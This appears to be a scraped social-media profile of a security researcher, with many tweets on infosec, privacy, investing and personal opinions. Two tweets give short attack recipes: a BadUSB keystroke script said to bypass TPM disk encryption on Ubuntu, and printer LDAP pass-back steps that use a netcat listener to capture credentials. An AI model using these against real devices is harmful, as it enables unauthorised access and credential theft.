Shadow0pz
@Shadow0pz
Followers
7K
Following
6K
Media
4K
Statuses
16K
A.I. | Datacenters | Cybersecurity | Builder | Dogs | Fmr: CoreWeave, BishopFox, Westinghouse Nuke, Microsoft Red Badge DOING THINGZ @HYPERIONGRAY
In Your Sisters DM's
Joined May 2016
Proud to announce that I'm joining forces with @_hyp3ri0n, @gperera and @HyperionGray to impose real cost on threat actors and cybersecurity vendors who have failed this industry for FAR too long. Those who seek to harm national interests or Human Rights will suffer kinetic and
3
0
12
@robby_rumble Clean Water Act and IEPA would like to have a word with this man to the tune of $100K/day+ in fines and cleanup charges plus a rather long visit to Federal Prison.
6
57
6K
Next time someone brosplains how I shouldn't be at the Gym or working out twice a day I'm just gonna show em this picture of @miakhalifa and remind them that just bc people don't play pro sports doesn't mean they aren't an Athlete. Mia crushes it daily. That's a lifestyle choice.
20
9
502
Wanna access Ubuntu 20 but it's Full Disk Encrypted with TPM? No problem! Grab a @flipper_zero or any BadUSB device/keyboard emulator and prepare to be unimpressed with my dev skills. Script: DELAY 15ms. ENTER. REPEAT 10000. Credit: #redteam
7
99
412
@6502_ftw Throw some aliases in there that all result in VI commands. Watch them die slowly.
6
7
210
@_hyp3ri0n Add my personal favorites. 'Pentest Report.pdf' (you can vary the name so the year is added etc.), use a big company name like 'Bank_of_America_Pentest_Q423_Final.pdf' and embed a canarytoken in it. Also works: Employees.xlsx, Payroll.pdf, Passwords.docx, etc. #PROFIT.
3
1
195
@MrZackMorris says buy $WISH and get in early. So I did it a few days ago. Then I hear markets "Red" so I pop in to check my portfolio. No Red in my portfolio. No clouds in my stones either. Why?. BC I listen to @MrZackMorris and when it dips I buy more. #GetPaidOrGetPlayed.
5
13
192
@GenMhayden is back! Merry Christmas sir! Once more into the fray. May God bless you and keep you and yours safe. I wish you a speedy recovery. #FinallySomethingGoodHappened.
0
17
125
@iBiteiStrike @ren_tragger It's actually less. 2020 has 2,016 working hours. $30,240 before state and federal taxes and without any health insurance. The lowest livable wage is Kentucky at $43,000. Massachusetts it's $60,000.
9
31
142
Since it appears everyone is asleep at the SOC. @solarwinds now would be a great time to remove the malicious packages STILL being hosted on your site. Like NOW. UNACCEPTABLE. (╯°□°）╯︵ ┻━┻
7
17
142
I want to add some context to the #IS00N leak. It's important to understand that China has VAST databases of correlated data on individuals. They can cross reference a MAC address and IP with a person and their associations, home address, friends, family, social credit score,
3
33
151
@chrisculling @hacks4pancakes Look into constructive discharge or dismissal. They just broke federal law and in doing so they likely violated their contract clauses with whatever agency they are supporting. If they're this bold there's likely a lot more under that rug. Don't sign ANYTHING. Call a lawyer asap.
1
3
125
Today @EpsonAmerica decided to threaten my kid with this message when he tried to print his school assignment. "non-genuine ink is recorded". Keyword recorded immediately triggered his DAD!!!!! Response. The Magenta is 100% "Genuine" but let's see where it's recorded shall we?
5
30
119
@natfriedman Allowing users who contribute to private repositories where the source cannot be shared to provide a brief description of the project or at least an indication of what it is/does. 99% of my work is private and commit activity means nothing to others.
4
0
121
@mshelton I've been in this space awhile and I think I can say unequivocally that there's not as many "Geniuses" in this space as Hollywood portrays. For reference, this is the SBI IQ scale. It only goes up to 162 points and is the "Gold Standard" of IQ tests. IQ = potential !talent
21
5
97
@shaunking Flip the image, level it so your mind isn't tricked by the perspective. Target the cab area and enhance a bit, and this is what we get. I'm going to run it through a couple of scrubbing scripts and see what comes out. Let's find this coward before he kills someone else.
2
9
90
@RAICESTEXAS @MarcusLuttrell Afghani family w SIV visas (Interpreter) is being deported @iah with his 7 family members Wife and young children. Visas are valid. Confusion on an envelope with meds records. Perhaps you could call a friend or two and ask them to look into it? #NeverQuit.
0
30
84
You said it couldn't be done. You called us liars and you doubled down. You threatened us and then you backed out of paying the bounties. So enjoy this little preview. And if you are a @Bitfi6 owner, just know that your coins were never safe, not even for a minute.
4
36
95
@hackermaderas I used to go to Goodwill, buy the HDD's recover the data, return it to the owner. Once found a 2TB external that was clicking. Took it apart, bumped the head. Recovered lost fam. photos going back 3gen. Sent a USB Drive in the mail with a note. He called me in tears. A good day.
3
12
86
Built a scanner for the #Cisco IOS XE WebShell detection. This INCLUDES the new IOC's. Also adds the ability to customize your UserAgent, Scan a single IP or concurrently scan a list or CIDR. Logging and the ability to add custom IOC's as well as proxying are all supported.
4
22
104
@Epson_Store I have Zero Tolerance for you recording any usage of anything on MY device. Is this data stored off of my printer? Associated with my Serial number or other identifier without my consent? Care to have your Data Privacy Officer give me a ring?
2
4
79
Hey @ECCOUNCIL let me help you out here. 1. Delete the LinkedIn survey. 2. Fire your Social Media team. 3. Unblock the community leaders and others who were blocked for speaking out. 4. Issue a sincere apology. 5. Update your "dress code". 6. Educate your org on DEI challenges.
2
19
88
@PiperBayard Can someone please send me a link to this app? I'm guessing it will take about 10 min to unravel it and then we'll just make sure EVERYONE is at every class. In fact, attendance will be at record highs. You may even find that students stay late. VERY late. Hotel California Late.
0
8
78
@IanColdwater He didn't resign, he 'ducked 🦆 out'... I'll see myself out. When I retire I'm deleting my LinkedIn account.
4
2
81
Don't sell your soul to Apple for a fused device. If you're an ios researcher in need of an ethical place to work where your work can help save lives. Plus tools and a team that can protect you while ensuring you get paid AND published. Just DM. P.S. we use @CorelliumHQ #NoFuses
Apple Sending Special iPhones to First Participants in Security Research Device Program by @julipuli
0
21
85
@NYPDIIU @troyhunt @Scott_Helme New category for @PwnieAwards "Best Law Enforcement Response to Security Incident" and the award goes to: @NYPDIIU for knowing the difference between research and criminal activity, and publicly distinguishing between the two without hesitation.
1
10
84
@lucasfryer I'd have thrown hands. This is awful. WTH is he doing! Who is this poor cameraman about to be departed from his body by a .50cal at point blank range? Hard Pass.
2
0
77
@notdan No Kevin I don't work at <REDACTED>. I work at FOAAS. If you wish to contact my employer you can do so securely using this link:
3
4
70
@JeffJacksonNC @JeffJacksonNC is there any truth to this bill encompassing not just TikTok but ANY app or site that the government deems a security threat? If so this sounds a lot more like censorship and I think that's why there's concern about it amongst your constituents.
8
3
61
When rescuing a hostage from a violent offender you don't engage the threat while the hostage is at risk unless the risk of death outweighs the risk to the hostage. You let the situation develop. Everyone drops their guard for a moment. It's your job to seize that. This Isn't It.
Man murders his girlfriend, steals her infant son. Cops say "challenge accepted!" and make sure to shoot the baby dead so no one can have him.
3
16
56
@Hac10101 Here's what I see. Mind you some of these may just be poor design choices or handled elsewhere but here: Passwords likely stored as plaintext. MD5 used for hashing. The secret key is hardcoded. No user input sanitization. HS256 is used for JWT signing. No SSL/TLS
9
3
68
@RSAConference Using @IanColdwater infinidash based implementation of the Blockchain Secure Unified Clustering K8 Solutions protocol (aka: Blockchain S.U.C.K.S) resolves all this. Look it up baby.
6
5
62
@cybergibbons I do a lot of firmware analysis and I use FAC. It's easy to extend and it uses common open source tools and an intuitive UI. Very slick and FREE!
2
16
68
@CorelliumHQ helps us investigate human rights violations in Apple devices. They're one of two vendors in our history that we have EVER publicly supported. This fight's important.
@runasand @washingtonpost Linking this older thread on how it all started. This was mainly about the 'copyright infringement' case Corellium won in December 2020. But Apple is persistent.
0
28
65
This has @IanColdwater vibes all over it. It's a shame it doesn't say "Look it up baby". Sorry Ian I know you probably tire of the tags for every goose picture but I do try to restrain myself.
1
1
59
@zackwhittaker Hey @tuftsvet You wanna explain why you have so many Apple Remote Desktop Systems WIDE OPEN to the internet? I won't go into the rest of the shit show that is your publicly facing internet but I'd think REAL HARD about what you did here.
1
5
59
@IanColdwater I see you have discovered the same underlying problem I have. Nothing on this platform is truly private.
1
3
57
@j_opdenakker "We take the security and privacy of our customers seriously" - Every Breached Company Ever
0
8
62
@officialmcafee @naqvis_syed I'll be happy to meet you at any public event. You bring your bitfi, I'll bring mine. We can play a little game. You show your dashboard and send a single transaction. Punch in your salt and Passphrase. When you are done you hand me the device. If I take the coins I keep them.
2
7
59
The things we find on LinkedIn posts are amazing. Thanks for the picture of your badge and phone as well as the RSA hard token and laptop. It will make some physical pen tester's day. Sorry about the RIF. @generalelectric #KnowTheRules #LanyardLife #Redacted
4
14
55
@TinkerSec @0xBDB Someone posted this the other day. Can't remember who (Sorry!). Find a printer. 1) Log into printer. 2) Look for LDAP configured. (There's your LDAP CFG.) 3) Point the destination to your PC. 4) netcat -l -vv -p 444. 5) Initiate an LDAP query. 6) Wait for creds.
1
13
57
@mubix So when you say no code exec you mean no code exec on SERVER01 at all? As in you don't want to make ANY calls to the server or changes to it because you don't want the defender to see you? That's tough but there's a low level way to do this that might avoid detection. Depends on
1
4
57
Since When? @Apple? Why does my USB connected device require an open mic to play music or use Maps? Privacy Violation Much?
7
9
53
@ppentestlabs This is what's about to happen. You started off by playing by the rules and responding (even when your practices are completely improper). Then came the right hook, you attempting to explain "secure" password storage and failing. The rest is going to be the ground and pound.
2
2
54
Here's your memory dump and your key/passphrase. That was easy. 3 people is NOT trust. @cybergibbons @Bitfi6
0
11
54
@63red So Scott. Just curious. How's that GoFundMe working out? 50K goal for an app? 25 donations for total $750. I'm sure the users whose PII you left leaking are gonna have questions for your lawyers. You do have a lawyer right? 50 states 50 privacy laws. Notified the AG's yet?
2
1
43
@n0x00 @kfalconspb Ummmm if you believe that you qualify for this role please contact me immediately. I PROMISE you I can find you a better job and the very last thing we will call you is entry level.
0
2
47
@trinertech As opposed to what? Turning away the parent for being a good parent who wants to learn something while exposing the child to other adults wishing to learn? OMG! The horror! No Ticket! Quick call the police! Same person probably calls cops on lemonade stands w/o permits.
1
0
46
In honor of the hard work my wife and friend has put into this industry for 20yrs and to support the power of diversity in InfoSec I am giving away 5 workshop seats to ANY WOMAN, POC, LGBTQ community member. Pls. Retweet for reach. @chadloder @aloria @find_evil @zackwhittaker.
5
51
47
@techspence In order to defend something you must first know what you are defending and why. Understand what makes that difficult from the inside and outside. Gain insight into the environment AND it's users challenges. Then assess it as an insider and as a threat. Document, Prioritize,.
4
1
51
@jsrailton @MalcolmNance Agree with @MalcolmNance although possible it's the P320-M18 variant with the 17rnd magazine in Coyote given the proportions in the video. It's the Civilian model of the US Military and specifically the USMC "official sidearm".
0
4
40
@rsandler21969 @chris_herd I've been WFH since 2007. I have accomplished more for my family and employers in that time than ever. I've never been "passed over" and I've been able to use the extra time I would lose in transit to mentor others and care for my gifted children. So tell me how I'm selfish?
0
2
37